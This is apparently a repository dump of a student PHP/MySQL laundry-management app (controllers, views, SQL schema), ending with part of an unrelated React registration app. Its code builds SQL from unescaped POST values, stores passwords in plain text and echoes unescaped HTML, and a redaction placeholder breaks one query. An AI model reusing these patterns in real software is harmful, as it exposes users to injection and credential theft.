// Default the pickup date to today when none was recorded yet.
$tanggal_ambil = formatDate($transaksi->tanggal_ambil) == "-" ? date("Y-m-d") : date("Y-m-d",strtotime($transaksi->tanggal_ambil));
$tanggal_ambil = $db->escape_string(postReq('tanggal_ambil',$tanggal_ambil));
$status = $db->escape_string(postReq('status',$transaksi->status));
$statuses = [1,2,3];
}
if(isButtonSubmit()){
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$db->query("UPDATE transaksi SET tanggal_ambil = '$tanggal_ambil', status = '$status' WHERE kode_transaksi = '$id';");
header("location: transaksi.php");
}
if(isAdd()){
try{
// NOTE(review): $user_id is never defined in this file — the code seed
// effectively only uses the timestamp; presumably $pegawai_id was meant.
$code = "TRX-".substr(md5(date('ymdhisa').$user_id),0,10);
$db->begin_transaction(MYSQLI_TRANS_START_READ_WRITE);
$total = 0;
foreach($details as $detail)
$total += ($detail['jumlah'] * $detail['harga']);
$transaksiQuery = $db->query("INSERT transaksi(kode_transaksi, konsumen_id,pegawai_id,tanggal_transaksi,total)
VALUES('$code','$konsumen_id', '$pegawai_id','$tanggal_transaksi','$total');
");
$last_id = $db->insert_id;
if(!$transaksiQuery)
throw new Exception("Insert transaksi Failed");
$values = [];
foreach($details as $detail)
// NOTE(review): layanan_id/jumlah come straight from POST and are NOT
// escaped here — SQL injection risk; escape_string them before use.
$values[] = "(NULL, '$code', '".$detail['layanan_id']."', '".$detail['jumlah']."')";
$transaksiDetailQuery = $db->query("INSERT detail_transaksi VALUES ".implode(',',$values).";");
if(!$transaksiDetailQuery)
throw new Exception("Insert detail transaksi failed");
$db->commit();
header('location: transaksi.php');
}catch(Exception $e){
$db->rollback();
// NOTE(review): other controllers use $errors (plural); this is never read.
$error['query'] = $e->getMessage();
header('location: transaksi.php?action=add');
}
}
}
?>
<?php
// Front controller for the "konsumen" (customer) module:
// add/edit requests render the form view, everything else the list view.
require_once "lib/bootstrap.php";
require_once "src/konsumen.php";
if(isAdd() || isEdit())
require_once "views/form_konsumen.php";
else
require_once "views/konsumen.php";
?>
# Tubes RPL <file_sep>/lib/format.php
<?php
function numberFormatID($value){
    // Indonesian digit grouping: "." thousands separator, no decimals.
    $formatted = number_format($value, 0, ',', '.');
    return $formatted;
}
function currencyID($value){
    // Prefix the Indonesian-formatted number with the Rupiah symbol.
    return sprintf("Rp. %s", numberFormatID($value));
}
function formatDate($date){
    // Render "d F Y"; empty values and MySQL zero-dates become "-".
    $zeroDates = ["0000-00-00", "0000-00-00 00:00:00"];
    if (empty($date) || in_array($date, $zeroDates, true)) {
        return "-";
    }
    return date("d F Y", strtotime($date));
}
function statusTrasaction($status){
    // Map a numeric transaction status to its display label.
    // NOTE(review): the function name has a typo ("Trasaction") but is kept
    // because callers depend on it.
    switch($status){
        case 1:
            return "On Progress";
        case 2:
            return "Ready Pickup";
        case 3:
            return "Complete";
        default:
            // Previously the switch fell through and implicitly returned null.
            return "Unknown";
    }
}
<?php
// CRUD controller for "pegawai" (employees) and their paired login accounts.
redirectWhenGuest('login.php');
$pegawai = [];
$pegawaiQuery = $db->query("SELECT * FROM user_login INNER JOIN pegawai ON user_login.pegawai_id = pegawai.id;");
while($r = $pegawaiQuery->fetch_object())
$pegawai[] = $r;
$nama = $db->escape_string(postReq('nama'));
$username = $db->escape_string(postReq('username'));
// NOTE(review): passwords are stored in plain text; hash before persisting.
$password = $db->escape_string(postReq('password'));
$no_hp = $db->escape_string(postReq('no_hp'));
if(isEdit()){
$id = $db->escape_string(getReq('id'));
$pegawai = $db->query("SELECT * FROM user_login INNER JOIN pegawai ON user_login.pegawai_id = pegawai.id WHERE pegawai.id = '$id';")->fetch_object();
$nama = $db->escape_string(postReq('nama',$pegawai->nama));
$username = $db->escape_string(postReq('username',$pegawai->username));
$password = $db->escape_string(postReq('password'));
$no_hp = $db->escape_string(postReq('no_hp',$pegawai->no_hp));
}
if(isDelete()){
$id = $db->escape_string(getReq('id'));
// Delete both the employee row and its login account.
$db->query("DELETE FROM pegawai WHERE id = '$id';");
$db->query("DELETE FROM user_login WHERE pegawai_id = '$id';");
header('location: pegawai.php');
}
if(isButtonSubmit()){
if(isEdit()){
$db->query("UPDATE pegawai SET nama = '$nama', no_hp = '$no_hp' WHERE id = '$id';");
// An empty password field means "keep the current password".
if(empty($password))
$db->query("UPDATE user_login SET username = '$username' WHERE pegawai_id = '$id';");
else
$db->query("UPDATE user_login SET username = '$username', password = '$<PASSWORD>' WHERE pegawai_id = '$id';");
}
if(isAdd()){
$db->query("INSERT pegawai(nama, no_hp) VALUES('$nama','$no_hp');");
$db->query("INSERT user_login(username, password, pegawai_id) VALUES('$username','$password',LAST_INSERT_ID());");
}
header('location: pegawai.php');
}
?>
<?php
// Front controller for the "layanan" (service) module:
// add/edit requests render the form view, everything else the list view.
require_once "lib/bootstrap.php";
require_once "src/layanan.php";
if(isAdd() || isEdit())
require_once "views/form_layanan.php";
else
require_once "views/layanan.php";
?>
// Pre-render one <option> per service from the global `layanan` array
// (injected by the PHP view before this script runs).
// NOTE(review): lay.nama is interpolated into HTML unescaped — stored XSS
// risk if service names can contain markup; confirm and escape if needed.
var layanan_field_html = '';
for(let lay of layanan){
layanan_field_html += `
<option value="${lay.id}">${lay.nama}</option>
`;
}
// Append a new transaction-detail row (service select + quantity input)
// to #trx_details; the random suffix makes each row post under a unique
// details[...] key (consumed by src/transaksi.php).
function addNewRow(){
let r = Math.random().toString(36).substring(7);
let trx_row = `
<div class="row" id="row-${r}">
<input type="hidden" class="harga-hidden" name="details[${r}][harga]">
<div class="col-lg-6">
<div class="form-group">
<label for="layanan_id">Konsumen</label>
<select class="form-control service-form" name="details[${r}][layanan_id]" id="layanan_id" onchange="selectService('${r}',this.value)">
<option value="">--PILIH Layanan--</option>
${layanan_field_html}
</select>
</div>
</div>
<div class="col-lg-3">
<div class="form-group">
<label for="jumlah">Jumlah</label>
<input type="number" required class="form-control qty-form" name="details[${r}][jumlah]" id="jumlah">
</div>
</div>
<div class="col-lg-1" style="margin-top: 40px;">
<span class="satuan"></span>
</div>
<div class="col-lg-2" style="margin-top: 35px;">
<button type="button" class="btn btn-danger btn-sm" onclick="deleteRow('#row-${r}')"><i class="fa fa-trash"></i></button>
</div>
</div>
`;
$("#trx_details").append(trx_row);
}
// Remove a detail row (identified by its jQuery selector) from the form.
function deleteRow(selector){
$(selector).remove();
}
// When a service is picked, fetch its price/unit from ajax_layanan.php and
// fill the row; the row's fields are cleared first so a failed or empty
// selection leaves them blank.
function selectService(rowid,value){
let rowSelector = '#row-'+rowid;
$(rowSelector).find('.satuan').text("")
$(rowSelector).find('.qty-form').val("");
$(rowSelector).find('.harga-hidden').val("");
if(value != ""){
fetch(`ajax_layanan.php?id=${value}`)
.then(res => res.json())
.then((res) => {
$(rowSelector).find('.satuan').text(`Rp. ${res.harga}/${res.satuan}`)
$(rowSelector).find('.qty-form').val(1);
$(rowSelector).find('.harga-hidden').val(res.harga);
})
.catch(console.error)
}
}
<?php
// Controller for the "layanan" (laundry service) resource: list, add,
// edit, delete. lib/bootstrap.php must be loaded first so $db and the
// auth/request helpers are in scope.
redirectWhenGuest('login.php');
// All services, for the listing view and form dropdowns.
$layanan = [];
$layananQuery = $db->query("SELECT * FROM layanan ;");
while($r = $layananQuery->fetch_object())
$layanan[] = $r;
// Form values, escaped for the hand-built SQL below.
$nama = $db->escape_string(postReq('nama'));
$harga = $db->escape_string(postReq('harga'));
$satuan = $db->escape_string(postReq('satuan'));
if(isEdit()){
$id = $db->escape_string(getReq('id'));
// NOTE: $layanan is re-purposed here from "list of services" to the
// single service being edited; the edit form view relies on this.
$layanan = $db->query("SELECT * FROM layanan WHERE id = '$id';")->fetch_object();
$nama = $db->escape_string(postReq('nama',$layanan->nama));
$harga = $db->escape_string(postReq('harga',$layanan->harga));
$satuan = $db->escape_string(postReq('satuan',$layanan->satuan));
}
if(isDelete()){
$id = $db->escape_string(getReq('id'));
$db->query("DELETE FROM layanan WHERE id = '$id';");
header('location: layanan.php');
exit; // header() does not stop execution; without exit the view was still rendered
}
if(isButtonSubmit()){
if(isEdit())
$db->query("UPDATE layanan SET nama = '$nama', satuan = '$satuan', harga = '$harga' WHERE id = '$id';");
if(isAdd())
$db->query("INSERT layanan(nama,harga,satuan) VALUES('$nama','$harga','$satuan');");
header('location: layanan.php');
exit; // stop here: nothing below should run once the redirect is issued
}
?><file_sep>/views/form_transaksi.php
<?php
// Add/edit form for a transaction: date, customer, and a dynamic list of
// service detail rows (extra rows are added client-side by assets/js/main.js).
// Fixes: the heading wrongly said "Data Layanan"; $i was never incremented
// inside the details loop, so every server-rendered row shared index 0 and
// later rows overwrote earlier ones in the POSTed details[] array.
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<h3 align="center"><?php echo isEdit()?"Edit": "Tambah" ?> Data Transaksi</h3>
<form action="<?php echo getCurrentUrl() ?>" method="post">
<div class="form-group">
<label for="tanggal_transaksi">Tanggal Transaksi</label>
<input type="date" required class="form-control" name="tanggal_transaksi" id="tanggal_transaksi" value="<?php echo $tanggal_transaksi ?>">
</div>
<div class="form-group">
<label for="konsumen_id">Konsumen</label>
<select class="form-control" name="konsumen_id" id="konsumen_id">
<option value="">--PILIH KONSUMEN--</option>
<?php foreach($konsumen as $r): ?>
<option value="<?php echo $r->id ?>"><?php echo $r->nama ?> (<?php echo $r->no_hp ?>)</option>
<?php endforeach ?>
</select>
</div>
<div id="trx_details">
<div class="pull-right">
<button type="button" class="btn btn-primary btn-sm" onclick="addNewRow()"><i class="fa fa-plus"></i></button>
</div>
<div class="clearfix"></div>
<?php $i=0;foreach($details as $detail): ?>
<div class="row" id="row-<?php echo $i ?>">
<input type="hidden" class="harga-hidden" name="details[<?php echo $i; ?>][harga]">
<div class="col-lg-6">
<div class="form-group">
<label for="layanan_id">Layanan</label>
<select class="form-control service-form" name="details[<?php echo $i; ?>][layanan_id]" id="layanan_id" onchange="selectService('<?php echo $i?>',this.value)">
<option value="">--PILIH Layanan--</option>
<?php foreach($layanan as $r): ?>
<option value="<?php echo $r->id ?>" <?php echo $detail['layanan_id'] == $r->id ? 'selected' : '' ?>><?php echo $r->nama ?></option>
<?php endforeach ?>
</select>
</div>
</div>
<div class="col-lg-2">
<div class="form-group">
<label for="jumlah">Jumlah</label>
<input type="number" required class="form-control qty-form" name="details[<?php echo $i; ?>][jumlah]" id="jumlah">
</div>
</div>
<div class="col-lg-2" style="margin-top: 40px;">
<span class="satuan"><?php echo empty($detail['harga']) ? $detail['harga'] : "Rp.".$detail['harga']."/".$detail['satuan'] ?></span>
</div>
<div class="col-lg-1" style="margin-top: 35px;">
<button type="button" class="btn btn-danger btn-sm" onclick="deleteRow('#row-<?php echo $i ?>')"><i class="fa fa-trash"></i></button>
</div>
</div>
<?php $i++;endforeach ?>
</div>
<button type="submit" name="submit" class="btn btn-primary">Simpan</button>
</form>
</div>
</div>
</div>
<script>
var layanan = JSON.parse('<?php echo json_encode($layanan) ?>');
</script>
<?php require_once "partials/footer.php"; ?><file_sep>/src/home.php
<?php
// Home/dashboard controller: nothing to prepare — it only gates access,
// sending unauthenticated visitors to the login page.
redirectWhenGuest('login.php');
?><file_sep>/lib/request.php
<?php
// Thin wrappers around PHP's request superglobals.

// True when the form was submitted via a button named $name.
function isButtonSubmit($name = 'submit'){
return isset($_POST[$name]);
}
// POST value, or $default when absent.
function postReq($name, $default = ''){
return $_POST[$name] ?? $default;
}
// GET value, or $default when absent.
function getReq($name, $default = ''){
return $_GET[$name] ?? $default;
}
function isPost(){
return $_SERVER['REQUEST_METHOD'] == "POST";
}
function isGet(){
return $_SERVER['REQUEST_METHOD'] == "GET";
}
// ?action=... helpers used by every CRUD controller.
function isEdit(){
return getReq('action') == "edit";
}
function isAdd(){
return getReq('action') == "add";
}
function isDelete(){
return getReq('action') == "delete";
}<file_sep>/rpl_laundry.sql
-- phpMyAdmin SQL Dump
-- version 4.9.0.1
-- https://www.phpmyadmin.net/
--
-- Host: localhost
-- Generation Time: Jul 29, 2019 at 12:55 PM
-- Server version: 10.3.15-MariaDB
-- PHP Version: 7.3.6
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `rpl_laundry`
--
-- --------------------------------------------------------
--
-- Table structure for table `detail_transaksi`
--
CREATE TABLE `detail_transaksi` (
`id` int(11) NOT NULL,
`kode_transaksi` varchar(20) NOT NULL,
`layanan_id` int(11) DEFAULT NULL,
`jumlah` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `detail_transaksi`
--
INSERT INTO `detail_transaksi` (`id`, `kode_transaksi`, `layanan_id`, `jumlah`) VALUES
(1, 'TRX-057c520833', 1, 1);
-- --------------------------------------------------------
--
-- Table structure for table `konsumen`
--
CREATE TABLE `konsumen` (
`id` int(11) NOT NULL,
`nama` varchar(50) NOT NULL,
`no_hp` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `konsumen`
--
INSERT INTO `konsumen` (`id`, `nama`, `no_hp`) VALUES
(2, 'Yuka', '0832143456');
-- --------------------------------------------------------
--
-- Table structure for table `layanan`
--
CREATE TABLE `layanan` (
`id` int(11) NOT NULL,
`nama` varchar(50) NOT NULL,
`harga` int(11) NOT NULL,
`satuan` varchar(10) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `layanan`
--
INSERT INTO `layanan` (`id`, `nama`, `harga`, `satuan`) VALUES
(1, 'Cuci Reguler', 5500, 'KG'),
(2, 'Cuci Ekspres', 7000, 'KG');
-- --------------------------------------------------------
--
-- Table structure for table `pegawai`
--
CREATE TABLE `pegawai` (
`id` int(11) NOT NULL,
`nama` varchar(50) NOT NULL,
`no_hp` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `pegawai`
--
INSERT INTO `pegawai` (`id`, `nama`, `no_hp`) VALUES
(2, 'Ahmad', '087324023435');
-- --------------------------------------------------------
--
-- Table structure for table `transaksi`
--
CREATE TABLE `transaksi` (
`kode_transaksi` varchar(20) NOT NULL,
`konsumen_id` int(11) DEFAULT NULL,
`pegawai_id` int(11) DEFAULT NULL,
`tanggal_transaksi` timestamp NOT NULL DEFAULT current_timestamp(),
`tanggal_ambil` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`status` tinyint(4) NOT NULL DEFAULT 1,
`total` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `transaksi`
--
INSERT INTO `transaksi` (`kode_transaksi`, `konsumen_id`, `pegawai_id`, `tanggal_transaksi`, `tanggal_ambil`, `status`, `total`) VALUES
('TRX-057c520833', 2, 2, '2019-07-28 17:00:00', '2019-07-30 17:00:00', 1, 5500);
-- --------------------------------------------------------
--
-- Table structure for table `user_login`
--
CREATE TABLE `user_login` (
`id` int(11) NOT NULL,
`username` varchar(20) NOT NULL,
`password` varchar(64) NOT NULL,
`pegawai_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `user_login`
--
INSERT INTO `user_login` (`id`, `username`, `password`, `pegawai_id`) VALUES
(1, '<PASSWORD>', 'password', 2);
--
-- Indexes for dumped tables
--
--
-- Indexes for table `detail_transaksi`
--
ALTER TABLE `detail_transaksi`
ADD PRIMARY KEY (`id`),
ADD KEY `kode_transaksi` (`kode_transaksi`),
ADD KEY `layanan_id` (`layanan_id`);
--
-- Indexes for table `konsumen`
--
ALTER TABLE `konsumen`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `layanan`
--
ALTER TABLE `layanan`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `pegawai`
--
ALTER TABLE `pegawai`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `transaksi`
--
ALTER TABLE `transaksi`
ADD PRIMARY KEY (`kode_transaksi`),
ADD KEY `konsumen_id` (`konsumen_id`),
ADD KEY `pegawai_id` (`pegawai_id`);
--
-- Indexes for table `user_login`
--
ALTER TABLE `user_login`
ADD PRIMARY KEY (`id`),
ADD KEY `pegawai_id` (`pegawai_id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `detail_transaksi`
--
ALTER TABLE `detail_transaksi`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT for table `konsumen`
--
ALTER TABLE `konsumen`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `layanan`
--
ALTER TABLE `layanan`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;
--
-- AUTO_INCREMENT for table `pegawai`
--
ALTER TABLE `pegawai`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT for table `user_login`
--
ALTER TABLE `user_login`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `detail_transaksi`
--
ALTER TABLE `detail_transaksi`
ADD CONSTRAINT `detail_transaksi_ibfk_1` FOREIGN KEY (`kode_transaksi`) REFERENCES `transaksi` (`kode_transaksi`) ON DELETE CASCADE,
ADD CONSTRAINT `detail_transaksi_ibfk_2` FOREIGN KEY (`layanan_id`) REFERENCES `layanan` (`id`) ON DELETE SET NULL;
--
-- Constraints for table `transaksi`
--
ALTER TABLE `transaksi`
ADD CONSTRAINT `transaksi_ibfk_1` FOREIGN KEY (`konsumen_id`) REFERENCES `konsumen` (`id`) ON DELETE SET NULL,
ADD CONSTRAINT `transaksi_ibfk_2` FOREIGN KEY (`pegawai_id`) REFERENCES `pegawai` (`id`) ON DELETE SET NULL;
--
-- Constraints for table `user_login`
--
ALTER TABLE `user_login`
ADD CONSTRAINT `user_login_ibfk_1` FOREIGN KEY (`pegawai_id`) REFERENCES `pegawai` (`id`) ON DELETE CASCADE;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/views/form_edit_transaksi.php
<?php
// Edit form for an existing transaction: pickup date and status.
// Fix: the heading was copy-pasted from the service form and wrongly
// said "Data Layanan".
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<h3 align="center"><?php echo isEdit()?"Edit": "Tambah" ?> Data Transaksi</h3>
<form action="<?php echo getCurrentUrl() ?>" method="post">
<div class="form-group">
<label for="tanggal_ambil">Tanggal Ambil</label>
<input type="date" required class="form-control" name="tanggal_ambil" id="tanggal_ambil" value="<?php echo $tanggal_ambil ?>">
</div>
<div class="form-group">
<label for="status">Status</label>
<select class="form-control" name="status" id="status">
<option>--PILIH STATUS--</option>
<?php foreach($statuses as $sts):?>
<option value="<?php echo $sts?>" <?php echo $sts == $status ? "selected":""?> ><?php echo statusTrasaction($sts);?></option>
<?php endforeach?>
</select>
</div>
<button type="submit" name="submit" class="btn btn-primary">Simpan</button>
</form>
</div>
</div>
</div>
<?php // NOTE(review): $layanan may not be defined by this view's controller;
// this script block looks copy-pasted from form_transaksi.php — confirm. ?>
<script>
var layanan = JSON.parse('<?php echo json_encode($layanan) ?>');
</script>
<?php require_once "partials/footer.php"; ?><file_sep>/views/form_pegawai.php
<?php
// Add/edit form for an employee (pegawai) and their login account.
// Fix: the password input's type attribute had been corrupted to the
// placeholder "<PASSWORD>" — restored to type="password".
require_once "partials/header.php";
require_once "partials/navbar.php";
?>
<br />
<div class="container">
<div class="row">
<div class="col-2 col-lg-2 col-md-2 no-padding my-menu">
<?php require_once "partials/menu.php"; ?>
</div>
<div class="col-10 col-lg-10 col-md-10 my-content">
<h3 align="center"><?php echo isEdit()?"Edit": "Tambah" ?> Data Pegawai</h3>
<form action="" method="post">
<div class="form-group">
<label for="nama">Nama</label>
<input type="text" required class="form-control" name="nama" id="nama" value="<?php echo $nama ?>">
</div>
<div class="form-group">
<label for="username">Username</label>
<input type="text" required class="form-control" name="username" id="username" value="<?php echo $username ?>">
</div>
<div class="form-group">
<label for="password">Password</label>
<?php // Not "required": the controller keeps the old password when this is left empty on edit. ?>
<input type="password" class="form-control" name="password" id="password">
</div>
<div class="form-group">
<label for="no_hp">No Handphone</label>
<input type="text" required class="form-control" name="no_hp" id="no_hp" value="<?php echo $no_hp ?>">
</div>
<button type="submit" name="submit" class="btn btn-primary">Simpan</button>
</form>
</div>
</div>
</div>
<?php require_once "partials/footer.php"; ?><file_sep>/views/partials/menu.php
<?php
// Sidebar navigation: script file => menu label. The entry whose file
// matches the current script gets Bootstrap's "active" class.
// Fix: missing space between the class="..." and role="tablist"
// attributes on the wrapper div.
$menus = [
"index.php" => "Beranda",
"pegawai.php" => "Pegawai",
"konsumen.php" => "Konsumen",
"layanan.php" => "Layanan",
"transaksi.php" => "Transaksi",
"logout.php" => "Keluar",
];
?>
<div class="nav flex-column nav-pills" role="tablist" aria-orientation="vertical">
<?php foreach($menus as $file => $menuName):?>
<a class="nav-link <?php echo $file == currScript() ? "active" : ""; ?>" href="<?php echo $file ?>" role="tab"><?php echo $menuName ?></a>
<?php endforeach; ?>
</div><file_sep>/lib/auth.php
<?php
// Session-backed authentication helpers.
session_start();
// Store the logged-in user's identifying fields in the session.
// $user must expose id, nama, username and pegawai_id.
function setUser($user){
$_SESSION["user"] = [
"id" => $user->id,
"nama" => $user->nama,
"username" => $user->username,
"pegawai_id" => $user->pegawai_id
];
}
/**
 * Read one attribute of the logged-in user from the session.
 * Returns null when nobody is logged in or the key is unknown.
 * The original dereferenced $_SESSION["user"][$key] BEFORE its isset()
 * check, emitting an undefined-index notice for missing keys; the
 * null-coalescing operator gives the same result without the notice.
 */
function getUserInfo($key){
return $_SESSION["user"][$key] ?? null;
}
// True when a user payload is stored in the session.
function isAuthenticated(){
return isset($_SESSION['user']);
}
// Convenience inverse of isAuthenticated().
function isGuest(){
return !isAuthenticated();
}
// Redirect helpers. Each now exit()s after sending the Location header:
// header() alone does NOT stop execution, so the original kept running
// the controller/view for a user who was being redirected away.
function redirectWhenAuthenticated($location){
if(isAuthenticated()){
header("location: $location");
exit;
}
}
function redirectWhenGuest($location){
if(!isAuthenticated()){
header("location: $location");
exit;
}
}
// NOTE(review): setUser() never stores a 'role' key, so getUserInfo('role')
// is always null here and EVERY authenticated user gets redirected —
// confirm whether a role field should be added to the session payload.
function redirectWhenNotAdmin($location){
if(isAuthenticated() && (getUserInfo('role') != "ADMIN")){
header("location: $location");
exit;
}
}<file_sep>/lib/bootstrap.php
<?php
// Central include file: pulls in every shared helper so that pages only
// need to require lib/bootstrap.php.
require_once "db.php";
require_once "auth.php";
require_once "format.php";
require_once "request.php";
require_once "cart_lib.php";
require_once "url.php";
require_once "error.php"; | 28b5c7f812732aefb93a5dbd2724fcae36c4f349 | [
"Markdown",
"SQL",
"JavaScript",
"PHP"
] | 30 | PHP | alaraiabdiallah/tubes_rpl | ae21f5ea50510a4e42822762a6ee132d5f039c2f | 50796f25fbe76679b8051f7417c09004a79ca795 |
refs/heads/master | <file_sep>import React, { Component } from 'react';
import ApiService from '../../services/api.service';
import Table from '../../components/Table';
import DashboardHeader from './DashboardHeader';
import { confirmAlert } from 'react-confirm-alert';
import 'react-confirm-alert/src/react-confirm-alert.css';
export default class Dashboard extends Component {
constructor(props) {
super(props)
this.state = {
searchTerm: '',
users: [],
defaultUsers: []
}
this.onChangeSearch = this.onChangeSearch.bind(this);
}
componentDidMount() {
this.getUsers();
}
getUsers = async () => {
try {
let users = await ApiService.getUsers();
this.setState({ users, defaultUsers: users });
} catch (err) {
console.error(err);
}
}
confirmDelete = (userId) => {
confirmAlert({
title: 'Delete user',
message: 'Do you want to delete this user?',
buttons: [
{
label: 'Deletar',
onClick: () => this.deleteUser(userId)
},
{
label: 'Cancel',
onClick: () => { }
}
]
});
}
deleteUser = (userId) => {
let { users } = this.state;
users = users.filter(el => el.id !== userId);
this.setState({ users });
}
onChangeSearch = (event) => {
let searchTerm = event.target.value;
this.setState({ searchTerm });
let { users, defaultUsers } = this.state;
if (searchTerm) {
let regex = new RegExp(searchTerm.toLowerCase());
users = defaultUsers.filter(element => {
return element.name.toLowerCase().match(regex) || element.username.toLowerCase().match(regex);
});
} else {
users = defaultUsers
}
this.setState({ users });
}
render() {
return (
<div className="container-fluid">
<DashboardHeader></DashboardHeader>
<div className="container-fluid">
<div className="row justify-content-md-center">
<div className="col-md-1 col-sm-12">
<h1>Users</h1>
</div>
<div className="col-md-7 col-sm-12">
<hr></hr>
</div>
<div className="col-md-3 col-sm-12">
<input
className="form-control" type="search"
value={this.state.searchTerm}
onChange={this.onChangeSearch}
placeholder="Filter table content"
aria-label="Search"></input>
</div>
</div>
<Table
users={this.state.users}
onDelete={this.confirmDelete}
></Table>
</div>
</div>
)
}
}
<file_sep>import React, { Component } from 'react';
export default class RegisterHeader extends Component {
render() {
return (
<div className="container-fluid">
<div className="row justify-content-md-center">
<div className="col-md-2 com-sm-12">
<h1>Registration</h1>
</div>
<div className="col-md-10 col-sm-12">
<hr></hr>
</div>
</div>
<div className="row justify-content-md-center header-register">
<div className="col-md-4 col-sm-12">
<h3>Need help?</h3>
<div className="row ">
<div className="col-2">
<h1><i className="far fa-life-ring"></i></h1>
</div>
<div className="col-8">
<p>Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua.</p>
</div>
</div>
</div>
<div className="col-md-4 col-sm-12">
<h3>Why register?</h3>
<div className="row">
<div className="col-2">
<h1><i className="fas fa-heartbeat"></i></h1>
</div>
<div className="col-8">
<p>Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua.</p>
</div>
</div>
</div>
<div className="col-md-4 col-sm-12">
<h3>What people are saying...</h3>
<div className="row">
<div className="col-2">
<h1><i className="far fa-smile"></i></h1>
</div>
<div className="col-8">
<p>Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor
incididunt ut labore et dolore magna aliqua.</p>
</div>
</div>
</div>
</div>
</div>
)
}
}<file_sep>import React from 'react';
import { BrowserRouter as Router, Route, Redirect, } from "react-router-dom";
import NavBar from '../components/NavBar';
import Navigation from '../components/Navigation';
import Dashboard from './Dashboard/Dashboard';
import Register from './Register/Register';
import 'bootstrap/dist/css/bootstrap.css';
import 'bootstrap/dist/js/bootstrap.js';
// Application shell: static top nav bar plus the routed pages.
// NOTE(review): <Navigation> (components/Navigation.js) wraps its children
// in ANOTHER <BrowserRouter>, so two routers are nested here, each with
// its own history object — confirm whether the inner Router should go.
function App() {
return (
<div className="App">
<NavBar></NavBar>
<Router>
<Navigation>
<Route exact path="/" render={() => (
<Redirect to="/user" />
)} />
<Route path="/user" exact component={Dashboard} />
<Route path="/user/new" exact component={Register} />
</Navigation>
</Router>
</div>
);
}
export default App;
<file_sep>/**
* @param {String} url
* @returns Promise<any>
*/
export function extractAsyncData(url) {
return new Promise((resolve, reject) => {
fetch(url)
.then(data => data.json())
.then(resolve)
.catch(reject);
});
}<file_sep># React-App-Sports
### Clone
Clone repository
$ git clone <EMAIL>:RafaelSSilveira/react-app-sports.git
### Build
Install dependencies
$ npm install
### Run
Run project
$ npm start
Access http://localhost:3000/
### Run Tests
$ npm run test<file_sep>import React, { Component } from 'react'
import Input from '../../components/Input'
import Button from '../../components/Button'
import Radio from './Radio'
import Checkbox from './Checkbox';
import ApiService from '../../services/api.service';
import RideInGroupMock from '../../services/mocks/rideInGroup';
import DaysOfWeek from '../../services/mocks/dayOfWeek';
import RegisterHeader from './RegisterHeader';
// Registration form: collects user fields, delegates persistence to
// ApiService.saveUser, then navigates back to the dashboard.
export default class Register extends Component {
constructor(props) {
super(props);
// NOTE(review): rideInGroupOptions / daysOfWeekOptions are kept in
// state but never passed to <Radio>/<Checkbox> below — presumably
// those components define their own options; confirm.
this.state = {
rideInGroupOptions: RideInGroupMock.labels,
daysOfWeekOptions: DaysOfWeek.labels,
username: '',
name: '',
email: '',
city: '',
rideInGroup: '',
daysOfWeek: []
}
}
// Prevent the browser's default submit (page reload) and save instead.
formSubmit = (event) => {
event.preventDefault();
this.saveUser();
}
// Persist the current form state; on success, go back to the user list.
saveUser = async () => {
let { username, name, email, city, rideInGroup, daysOfWeek } = this.state;
let response = await ApiService.saveUser(name, username, email, city, rideInGroup, daysOfWeek);
if (response) {
this.props.history.push('/user')
}
}
// One controlled-input handler per scalar field.
onNameChange = (event) => {
this.setState({ name: event.target.value });
}
onUsernameChange = (event) => {
this.setState({ username: event.target.value });
}
onEmailChange = (event) => {
this.setState({ email: event.target.value });
}
